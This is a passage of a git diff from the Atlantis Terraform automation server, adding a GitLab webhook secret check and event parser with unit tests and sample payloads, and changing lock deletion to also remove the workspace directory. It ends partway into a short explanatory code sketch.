- buf := bytes.NewBufferString(mergeEventJSON)
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
- b, err := parser.Validate(req, nil)
- Ok(t, err)
- Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
- RegisterMockTestingT(t)
-}
-
-func TestValidate_ValidMergeCommentEvent(t *testing.T) {
- t.Log("If the merge comment event is valid it should be returned")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString(mergeCommentEventJSON)
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Note Hook")
- b, err := parser.Validate(req, nil)
- Ok(t, err)
- Equals(t, "Gitlab Test", b.(gitlab.MergeCommentEvent).Project.Name)
- RegisterMockTestingT(t)
-}
-
-var mergeEventJSON = `{
- "object_kind": "merge_request",
- "user": {
- "name": "Administrator",
- "username": "root",
- "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
- },
- "project": {
- "id": 1,
- "name":"Gitlab Test",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/gitlabhq/gitlab-test",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
- "namespace":"GitlabHQ",
- "visibility_level":20,
- "path_with_namespace":"gitlabhq/gitlab-test",
- "default_branch":"master",
- "homepage":"http://example.com/gitlabhq/gitlab-test",
- "url":"https://example.com/gitlabhq/gitlab-test.git",
- "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "http_url":"https://example.com/gitlabhq/gitlab-test.git"
- },
- "repository": {
- "name": "Gitlab Test",
- "url": "https://example.com/gitlabhq/gitlab-test.git",
- "description": "Aut reprehenderit ut est.",
- "homepage": "http://example.com/gitlabhq/gitlab-test"
- },
- "object_attributes": {
- "id": 99,
- "target_branch": "master",
- "source_branch": "ms-viewport",
- "source_project_id": 14,
- "author_id": 51,
- "assignee_id": 6,
- "title": "MS-Viewport",
- "created_at": "2013-12-03T17:23:34Z",
- "updated_at": "2013-12-03T17:23:34Z",
- "st_commits": null,
- "st_diffs": null,
- "milestone_id": null,
- "state": "opened",
- "merge_status": "unchecked",
- "target_project_id": 14,
- "iid": 1,
- "description": "",
- "source": {
- "name":"Awesome Project",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/awesome_space/awesome_project",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:awesome_space/awesome_project.git",
- "git_http_url":"http://example.com/awesome_space/awesome_project.git",
- "namespace":"Awesome Space",
- "visibility_level":20,
- "path_with_namespace":"awesome_space/awesome_project",
- "default_branch":"master",
- "homepage":"http://example.com/awesome_space/awesome_project",
- "url":"http://example.com/awesome_space/awesome_project.git",
- "ssh_url":"git@example.com:awesome_space/awesome_project.git",
- "http_url":"http://example.com/awesome_space/awesome_project.git"
- },
- "target": {
- "name":"Awesome Project",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/awesome_space/awesome_project",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:awesome_space/awesome_project.git",
- "git_http_url":"http://example.com/awesome_space/awesome_project.git",
- "namespace":"Awesome Space",
- "visibility_level":20,
- "path_with_namespace":"awesome_space/awesome_project",
- "default_branch":"master",
- "homepage":"http://example.com/awesome_space/awesome_project",
- "url":"http://example.com/awesome_space/awesome_project.git",
- "ssh_url":"git@example.com:awesome_space/awesome_project.git",
- "http_url":"http://example.com/awesome_space/awesome_project.git"
- },
- "last_commit": {
- "id": "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
- "message": "fixed readme",
- "timestamp": "2012-01-03T23:36:29+02:00",
- "url": "http://example.com/awesome_space/awesome_project/commits/da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
- "author": {
- "name": "GitLab dev user",
- "email": "gitlabdev@dv6700.(none)"
- }
- },
- "work_in_progress": false,
- "url": "http://example.com/diaspora/merge_requests/1",
- "action": "open",
- "assignee": {
- "name": "User1",
- "username": "user1",
- "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
- }
- },
- "labels": [{
- "id": 206,
- "title": "API",
- "color": "#ffffff",
- "project_id": 14,
- "created_at": "2013-12-03T17:15:43Z",
- "updated_at": "2013-12-03T17:15:43Z",
- "template": false,
- "description": "API related issues",
- "type": "ProjectLabel",
- "group_id": 41
- }],
- "changes": {
- "updated_by_id": [null, 1],
- "updated_at": ["2017-09-15 16:50:55 UTC", "2017-09-15 16:52:00 UTC"],
- "labels": {
- "previous": [{
- "id": 206,
- "title": "API",
- "color": "#ffffff",
- "project_id": 14,
- "created_at": "2013-12-03T17:15:43Z",
- "updated_at": "2013-12-03T17:15:43Z",
- "template": false,
- "description": "API related issues",
- "type": "ProjectLabel",
- "group_id": 41
- }],
- "current": [{
- "id": 205,
- "title": "Platform",
- "color": "#123123",
- "project_id": 14,
- "created_at": "2013-12-03T17:15:43Z",
- "updated_at": "2013-12-03T17:15:43Z",
- "template": false,
- "description": "Platform related issues",
- "type": "ProjectLabel",
- "group_id": 41
- }]
- }
- }
-}`
-
-var mergeCommentEventJSON = `{
- "object_kind": "note",
- "user": {
- "name": "Administrator",
- "username": "root",
- "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
- },
- "project_id": 5,
- "project":{
- "id": 5,
- "name":"Gitlab Test",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/gitlabhq/gitlab-test",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
- "namespace":"Gitlab Org",
- "visibility_level":10,
- "path_with_namespace":"gitlabhq/gitlab-test",
- "default_branch":"master",
- "homepage":"http://example.com/gitlabhq/gitlab-test",
- "url":"https://example.com/gitlabhq/gitlab-test.git",
- "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "http_url":"https://example.com/gitlabhq/gitlab-test.git"
- },
- "repository":{
- "name": "Gitlab Test",
- "url": "http://localhost/gitlab-org/gitlab-test.git",
- "description": "Aut reprehenderit ut est.",
- "homepage": "http://example.com/gitlab-org/gitlab-test"
- },
- "object_attributes": {
- "id": 1244,
- "note": "This MR needs work.",
- "noteable_type": "MergeRequest",
- "author_id": 1,
- "created_at": "2015-05-17",
- "updated_at": "2015-05-17",
- "project_id": 5,
- "attachment": null,
- "line_code": null,
- "commit_id": "",
- "noteable_id": 7,
- "system": false,
- "st_diff": null,
- "url": "http://example.com/gitlab-org/gitlab-test/merge_requests/1#note_1244"
- },
- "merge_request": {
- "id": 7,
- "target_branch": "markdown",
- "source_branch": "master",
- "source_project_id": 5,
- "author_id": 8,
- "assignee_id": 28,
- "title": "Tempora et eos debitis quae laborum et.",
- "created_at": "2015-03-01 20:12:53 UTC",
- "updated_at": "2015-03-21 18:27:27 UTC",
- "milestone_id": 11,
- "state": "opened",
- "merge_status": "cannot_be_merged",
- "target_project_id": 5,
- "iid": 1,
- "description": "Et voluptas corrupti assumenda temporibus. Architecto cum animi eveniet amet asperiores. Vitae numquam voluptate est natus sit et ad id.",
- "position": 0,
- "source":{
- "name":"Gitlab Test",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/gitlab-org/gitlab-test",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:gitlab-org/gitlab-test.git",
- "git_http_url":"https://example.com/gitlab-org/gitlab-test.git",
- "namespace":"Gitlab Org",
- "visibility_level":10,
- "path_with_namespace":"gitlab-org/gitlab-test",
- "default_branch":"master",
- "homepage":"http://example.com/gitlab-org/gitlab-test",
- "url":"https://example.com/gitlab-org/gitlab-test.git",
- "ssh_url":"git@example.com:gitlab-org/gitlab-test.git",
- "http_url":"https://example.com/gitlab-org/gitlab-test.git",
- "git_http_url":"https://example.com/gitlab-org/gitlab-test.git"
- },
- "target": {
- "name":"Gitlab Test",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/gitlabhq/gitlab-test",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
- "namespace":"Gitlab Org",
- "visibility_level":10,
- "path_with_namespace":"gitlabhq/gitlab-test",
- "default_branch":"master",
- "homepage":"http://example.com/gitlabhq/gitlab-test",
- "url":"https://example.com/gitlabhq/gitlab-test.git",
- "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "http_url":"https://example.com/gitlabhq/gitlab-test.git"
- },
- "last_commit": {
- "id": "562e173be03b8ff2efb05345d12df18815438a4b",
- "message": "Merge branch 'another-branch' into 'master'\n\nCheck in this test\n",
- "timestamp": "2002-10-02T10:00:00-05:00",
- "url": "http://example.com/gitlab-org/gitlab-test/commit/562e173be03b8ff2efb05345d12df18815438a4b",
- "author": {
- "name": "John Smith",
- "email": "john@example.com"
- }
- },
- "work_in_progress": false,
- "assignee": {
- "name": "User1",
- "username": "user1",
- "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
- }
- }
-}`
diff --git a/server/gitlab_request_parser_validator.go b/server/gitlab_request_parser_validator.go
new file mode 100644
index 0000000000..ee486248f9
--- /dev/null
+++ b/server/gitlab_request_parser_validator.go
@@ -0,0 +1,90 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package server
+
+import (
+ "encoding/json"
+ "fmt"
+ "io/ioutil"
+ "net/http"
+
+ "github.com/lkysow/go-gitlab"
+)
+
+const secretHeader = "X-Gitlab-Token" // #nosec
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser_validator.go GitlabRequestParserValidator
+
+// GitlabRequestParserValidator parses and validates GitLab requests.
+type GitlabRequestParserValidator interface {
+ // ParseAndValidate validates that the request has a token header matching secret.
+ // If the secret does not match it returns an error.
+ // If secret is empty it does not check the token header.
+ // It then parses the request as a GitLab object depending on the header
+ // provided by GitLab identifying the webhook type. If the webhook type
+ // is not recognized it will return nil but will not return an error.
+ // Usage:
+ // event, err := GitlabRequestParserValidator.ParseAndValidate(r, secret)
+ // if err != nil {
+ // return
+ // }
+ // switch event := event.(type) {
+ // case gitlab.MergeCommentEvent:
+ // // handle
+ // case gitlab.MergeEvent:
+ // // handle
+ // default:
+ // // unsupported event
+ // }
+ ParseAndValidate(r *http.Request, secret []byte) (interface{}, error)
+}
+
+// DefaultGitlabRequestParserValidator parses and validates GitLab requests.
+type DefaultGitlabRequestParserValidator struct{}
+
+// ParseAndValidate parses and validates the request's JSON payload.
+// See GitlabRequestParserValidator.ParseAndValidate().
+func (d *DefaultGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) {
+ const mergeEventHeader = "Merge Request Hook"
+ const noteEventHeader = "Note Hook"
+
+ // Validate secret if specified.
+ headerSecret := r.Header.Get(secretHeader)
+ secretStr := string(secret)
+ if len(secret) != 0 && headerSecret != secretStr {
+ return nil, fmt.Errorf("header %s=%s did not match expected secret", secretHeader, headerSecret)
+ }
+
+ // Parse request into a gitlab object based on the object type specified
+ // in the gitlabHeader.
+ bytes, err := ioutil.ReadAll(r.Body)
+ if err != nil {
+ return nil, err
+ }
+ switch r.Header.Get(gitlabHeader) {
+ case mergeEventHeader:
+ var m gitlab.MergeEvent
+ if err := json.Unmarshal(bytes, &m); err != nil {
+ return nil, err
+ }
+ return m, nil
+ case noteEventHeader:
+ var m gitlab.MergeCommentEvent
+ if err := json.Unmarshal(bytes, &m); err != nil {
+ return nil, err
+ }
+ return m, nil
+ }
+ return nil, nil
+}
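
For context, a minimal sketch of how a caller might consume ParseAndValidate, assuming the wiring below (the handler, port, and secret value are illustrative; the parser type and the gitlab event types come from the file above):

    package main

    import (
        "net/http"

        "github.com/lkysow/go-gitlab"
        "github.com/runatlantis/atlantis/server"
    )

    func main() {
        parser := &server.DefaultGitlabRequestParserValidator{}
        secret := []byte("webhook-secret") // illustrative; an empty secret disables the check

        http.HandleFunc("/events", func(w http.ResponseWriter, r *http.Request) {
            event, err := parser.ParseAndValidate(r, secret)
            if err != nil {
                // secret mismatch or malformed JSON
                http.Error(w, err.Error(), http.StatusBadRequest)
                return
            }
            switch event.(type) {
            case gitlab.MergeEvent:
                // new or updated merge request, e.g. trigger an autoplan
            case gitlab.MergeCommentEvent:
                // comment on a merge request, e.g. parse an atlantis command
            default:
                // nil: a webhook type we don't handle; ignore it
            }
            w.WriteHeader(http.StatusOK)
        })
        _ = http.ListenAndServe(":4141", nil)
    }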
diff --git a/server/gitlab_request_parser_validator_test.go b/server/gitlab_request_parser_validator_test.go
new file mode 100644
index 0000000000..eacbc1d4a2
--- /dev/null
+++ b/server/gitlab_request_parser_validator_test.go
@@ -0,0 +1,386 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package server_test
+
+import (
+ "bytes"
+ "net/http"
+ "testing"
+
+ "github.com/lkysow/go-gitlab"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+var parser = server.DefaultGitlabRequestParserValidator{}
+
+func TestValidate_InvalidSecret(t *testing.T) {
+	t.Log("If the secret header is set and doesn't match the expected secret an error is returned")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString("")
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Token", "does-not-match")
+ _, err = parser.ParseAndValidate(req, []byte("secret"))
+ Assert(t, err != nil, "should be an error")
+ Equals(t, "header X-Gitlab-Token=does-not-match did not match expected secret", err.Error())
+}
+
+func TestValidate_ValidSecret(t *testing.T) {
+ t.Log("If the secret header matches then the event is returned")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString(mergeEventJSON)
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Token", "secret")
+ req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
+ b, err := parser.ParseAndValidate(req, []byte("secret"))
+ Ok(t, err)
+ Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
+}
+
+func TestValidate_NoSecret(t *testing.T) {
+ t.Log("If there is no secret then we ignore the secret header and return the event")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString(mergeEventJSON)
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Token", "random secret")
+ req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
+ b, err := parser.ParseAndValidate(req, nil)
+ Ok(t, err)
+ Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
+}
+
+func TestValidate_InvalidMergeEvent(t *testing.T) {
+ t.Log("If the merge event is malformed there should be an error")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString("{")
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
+ _, err = parser.ParseAndValidate(req, nil)
+ Assert(t, err != nil, "should be an error")
+ Equals(t, "unexpected end of JSON input", err.Error())
+}
+
+func TestValidate_InvalidMergeCommentEvent(t *testing.T) {
+ t.Log("If the merge comment event is malformed there should be an error")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString("{")
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Note Hook")
+ _, err = parser.ParseAndValidate(req, nil)
+ Assert(t, err != nil, "should be an error")
+ Equals(t, "unexpected end of JSON input", err.Error())
+}
+
+func TestValidate_UnrecognizedEvent(t *testing.T) {
+ t.Log("If the event is not one we care about we return nil")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString("")
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Random Event")
+ event, err := parser.ParseAndValidate(req, nil)
+ Ok(t, err)
+ Equals(t, nil, event)
+}
+
+func TestValidate_ValidMergeEvent(t *testing.T) {
+ t.Log("If the merge event is valid it should be returned")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString(mergeEventJSON)
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
+ b, err := parser.ParseAndValidate(req, nil)
+ Ok(t, err)
+ Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
+}
+
+func TestValidate_ValidMergeCommentEvent(t *testing.T) {
+ t.Log("If the merge comment event is valid it should be returned")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString(mergeCommentEventJSON)
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Note Hook")
+ b, err := parser.ParseAndValidate(req, nil)
+ Ok(t, err)
+ Equals(t, "Gitlab Test", b.(gitlab.MergeCommentEvent).Project.Name)
+}
+
+var mergeEventJSON = `{
+ "object_kind": "merge_request",
+ "user": {
+ "name": "Administrator",
+ "username": "root",
+ "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
+ },
+ "project": {
+ "id": 1,
+ "name":"Gitlab Test",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/gitlabhq/gitlab-test",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
+ "namespace":"GitlabHQ",
+ "visibility_level":20,
+ "path_with_namespace":"gitlabhq/gitlab-test",
+ "default_branch":"master",
+ "homepage":"http://example.com/gitlabhq/gitlab-test",
+ "url":"https://example.com/gitlabhq/gitlab-test.git",
+ "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "http_url":"https://example.com/gitlabhq/gitlab-test.git"
+ },
+ "repository": {
+ "name": "Gitlab Test",
+ "url": "https://example.com/gitlabhq/gitlab-test.git",
+ "description": "Aut reprehenderit ut est.",
+ "homepage": "http://example.com/gitlabhq/gitlab-test"
+ },
+ "object_attributes": {
+ "id": 99,
+ "target_branch": "master",
+ "source_branch": "ms-viewport",
+ "source_project_id": 14,
+ "author_id": 51,
+ "assignee_id": 6,
+ "title": "MS-Viewport",
+ "created_at": "2013-12-03T17:23:34Z",
+ "updated_at": "2013-12-03T17:23:34Z",
+ "st_commits": null,
+ "st_diffs": null,
+ "milestone_id": null,
+ "state": "opened",
+ "merge_status": "unchecked",
+ "target_project_id": 14,
+ "iid": 1,
+ "description": "",
+ "source": {
+ "name":"Awesome Project",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/awesome_space/awesome_project",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:awesome_space/awesome_project.git",
+ "git_http_url":"http://example.com/awesome_space/awesome_project.git",
+ "namespace":"Awesome Space",
+ "visibility_level":20,
+ "path_with_namespace":"awesome_space/awesome_project",
+ "default_branch":"master",
+ "homepage":"http://example.com/awesome_space/awesome_project",
+ "url":"http://example.com/awesome_space/awesome_project.git",
+ "ssh_url":"git@example.com:awesome_space/awesome_project.git",
+ "http_url":"http://example.com/awesome_space/awesome_project.git"
+ },
+ "target": {
+ "name":"Awesome Project",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/awesome_space/awesome_project",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:awesome_space/awesome_project.git",
+ "git_http_url":"http://example.com/awesome_space/awesome_project.git",
+ "namespace":"Awesome Space",
+ "visibility_level":20,
+ "path_with_namespace":"awesome_space/awesome_project",
+ "default_branch":"master",
+ "homepage":"http://example.com/awesome_space/awesome_project",
+ "url":"http://example.com/awesome_space/awesome_project.git",
+ "ssh_url":"git@example.com:awesome_space/awesome_project.git",
+ "http_url":"http://example.com/awesome_space/awesome_project.git"
+ },
+ "last_commit": {
+ "id": "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
+ "message": "fixed readme",
+ "timestamp": "2012-01-03T23:36:29+02:00",
+ "url": "http://example.com/awesome_space/awesome_project/commits/da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
+ "author": {
+ "name": "GitLab dev user",
+ "email": "gitlabdev@dv6700.(none)"
+ }
+ },
+ "work_in_progress": false,
+ "url": "http://example.com/diaspora/merge_requests/1",
+ "action": "open",
+ "assignee": {
+ "name": "User1",
+ "username": "user1",
+ "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
+ }
+ },
+ "labels": [{
+ "id": 206,
+ "title": "API",
+ "color": "#ffffff",
+ "project_id": 14,
+ "created_at": "2013-12-03T17:15:43Z",
+ "updated_at": "2013-12-03T17:15:43Z",
+ "template": false,
+ "description": "API related issues",
+ "type": "ProjectLabel",
+ "group_id": 41
+ }],
+ "changes": {
+ "updated_by_id": [null, 1],
+ "updated_at": ["2017-09-15 16:50:55 UTC", "2017-09-15 16:52:00 UTC"],
+ "labels": {
+ "previous": [{
+ "id": 206,
+ "title": "API",
+ "color": "#ffffff",
+ "project_id": 14,
+ "created_at": "2013-12-03T17:15:43Z",
+ "updated_at": "2013-12-03T17:15:43Z",
+ "template": false,
+ "description": "API related issues",
+ "type": "ProjectLabel",
+ "group_id": 41
+ }],
+ "current": [{
+ "id": 205,
+ "title": "Platform",
+ "color": "#123123",
+ "project_id": 14,
+ "created_at": "2013-12-03T17:15:43Z",
+ "updated_at": "2013-12-03T17:15:43Z",
+ "template": false,
+ "description": "Platform related issues",
+ "type": "ProjectLabel",
+ "group_id": 41
+ }]
+ }
+ }
+}`
+
+var mergeCommentEventJSON = `{
+ "object_kind": "note",
+ "user": {
+ "name": "Administrator",
+ "username": "root",
+ "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
+ },
+ "project_id": 5,
+ "project":{
+ "id": 5,
+ "name":"Gitlab Test",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/gitlabhq/gitlab-test",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
+ "namespace":"Gitlab Org",
+ "visibility_level":10,
+ "path_with_namespace":"gitlabhq/gitlab-test",
+ "default_branch":"master",
+ "homepage":"http://example.com/gitlabhq/gitlab-test",
+ "url":"https://example.com/gitlabhq/gitlab-test.git",
+ "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "http_url":"https://example.com/gitlabhq/gitlab-test.git"
+ },
+ "repository":{
+ "name": "Gitlab Test",
+ "url": "http://localhost/gitlab-org/gitlab-test.git",
+ "description": "Aut reprehenderit ut est.",
+ "homepage": "http://example.com/gitlab-org/gitlab-test"
+ },
+ "object_attributes": {
+ "id": 1244,
+ "note": "This MR needs work.",
+ "noteable_type": "MergeRequest",
+ "author_id": 1,
+ "created_at": "2015-05-17",
+ "updated_at": "2015-05-17",
+ "project_id": 5,
+ "attachment": null,
+ "line_code": null,
+ "commit_id": "",
+ "noteable_id": 7,
+ "system": false,
+ "st_diff": null,
+ "url": "http://example.com/gitlab-org/gitlab-test/merge_requests/1#note_1244"
+ },
+ "merge_request": {
+ "id": 7,
+ "target_branch": "markdown",
+ "source_branch": "master",
+ "source_project_id": 5,
+ "author_id": 8,
+ "assignee_id": 28,
+ "title": "Tempora et eos debitis quae laborum et.",
+ "created_at": "2015-03-01 20:12:53 UTC",
+ "updated_at": "2015-03-21 18:27:27 UTC",
+ "milestone_id": 11,
+ "state": "opened",
+ "merge_status": "cannot_be_merged",
+ "target_project_id": 5,
+ "iid": 1,
+ "description": "Et voluptas corrupti assumenda temporibus. Architecto cum animi eveniet amet asperiores. Vitae numquam voluptate est natus sit et ad id.",
+ "position": 0,
+ "source":{
+ "name":"Gitlab Test",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/gitlab-org/gitlab-test",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:gitlab-org/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlab-org/gitlab-test.git",
+ "namespace":"Gitlab Org",
+ "visibility_level":10,
+ "path_with_namespace":"gitlab-org/gitlab-test",
+ "default_branch":"master",
+ "homepage":"http://example.com/gitlab-org/gitlab-test",
+ "url":"https://example.com/gitlab-org/gitlab-test.git",
+ "ssh_url":"git@example.com:gitlab-org/gitlab-test.git",
+ "http_url":"https://example.com/gitlab-org/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlab-org/gitlab-test.git"
+ },
+ "target": {
+ "name":"Gitlab Test",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/gitlabhq/gitlab-test",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
+ "namespace":"Gitlab Org",
+ "visibility_level":10,
+ "path_with_namespace":"gitlabhq/gitlab-test",
+ "default_branch":"master",
+ "homepage":"http://example.com/gitlabhq/gitlab-test",
+ "url":"https://example.com/gitlabhq/gitlab-test.git",
+ "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "http_url":"https://example.com/gitlabhq/gitlab-test.git"
+ },
+ "last_commit": {
+ "id": "562e173be03b8ff2efb05345d12df18815438a4b",
+ "message": "Merge branch 'another-branch' into 'master'\n\nCheck in this test\n",
+ "timestamp": "2002-10-02T10:00:00-05:00",
+ "url": "http://example.com/gitlab-org/gitlab-test/commit/562e173be03b8ff2efb05345d12df18815438a4b",
+ "author": {
+ "name": "John Smith",
+ "email": "john@example.com"
+ }
+ },
+ "work_in_progress": false,
+ "assignee": {
+ "name": "User1",
+ "username": "user1",
+ "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
+ }
+ }
+}`
diff --git a/server/locks_controller.go b/server/locks_controller.go
index d345b68411..140cb30460 100644
--- a/server/locks_controller.go
+++ b/server/locks_controller.go
@@ -7,6 +7,7 @@ import (
"strings"
"github.com/gorilla/mux"
+ "github.com/runatlantis/atlantis/server/events"
"github.com/runatlantis/atlantis/server/events/locking"
"github.com/runatlantis/atlantis/server/events/models"
"github.com/runatlantis/atlantis/server/events/vcs"
@@ -20,6 +21,8 @@ type LocksController struct {
Logger *logging.SimpleLogger
VCSClient vcs.ClientProxy
LockDetailTemplate TemplateWriter
+ WorkingDir events.WorkingDir
+ WorkingDirLocker events.WorkingDirLocker
}
// GetLock is the GET /locks/{id} route. It renders the lock detail view.
@@ -84,20 +87,29 @@ func (l *LocksController) DeleteLock(w http.ResponseWriter, r *http.Request) {
return
}
- // Once the lock has been deleted, comment back on the pull request.
- comment := fmt.Sprintf("**Warning**: The plan for path: `%s` workspace: `%s` was **discarded** via the Atlantis UI.\n\n"+
- "To `apply` you must run `plan` again.", lock.Project.Path, lock.Workspace)
// NOTE: Because BaseRepo was added to the PullRequest model later, previous
// installations of Atlantis will have locks in their DB that do not have
- // this field on PullRequest. We skip commenting in this case.
+ // this field on PullRequest. We skip commenting and deleting the working dir in this case.
if lock.Pull.BaseRepo != (models.Repo{}) {
+ unlock, err := l.WorkingDirLocker.TryLock(lock.Pull.BaseRepo.FullName, lock.Workspace, lock.Pull.Num)
+ if err != nil {
+ l.Logger.Err("unable to obtain working dir lock when trying to delete old plans: %s", err)
+ } else {
+ defer unlock()
+			if err := l.WorkingDir.DeleteForWorkspace(lock.Pull.BaseRepo, lock.Pull, lock.Workspace); err != nil {
+				l.Logger.Err("unable to delete workspace: %s", err)
+			}
+ }
+
+ // Once the lock has been deleted, comment back on the pull request.
+ comment := fmt.Sprintf("**Warning**: The plan for dir: `%s` workspace: `%s` was **discarded** via the Atlantis UI.\n\n"+
+ "To `apply` you must run `plan` again.", lock.Project.Path, lock.Workspace)
err = l.VCSClient.CreateComment(lock.Pull.BaseRepo, lock.Pull.Num, comment)
if err != nil {
l.respond(w, logging.Error, http.StatusInternalServerError, "Failed commenting on pull request: %s", err)
return
}
} else {
- l.Logger.Debug("skipping commenting on pull request that lock was deleted because BaseRepo field is empty")
+ l.Logger.Debug("skipping commenting on pull request and deleting workspace because BaseRepo field is empty")
}
l.respond(w, logging.Info, http.StatusOK, "Deleted lock id %q", id)
}
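
To make the locking contract in the hunk above concrete, here is a hedged sketch of the TryLock pattern it relies on (the helper name and parameters are hypothetical; the WorkingDir and WorkingDirLocker call signatures are taken from the calls above):

    package example

    import (
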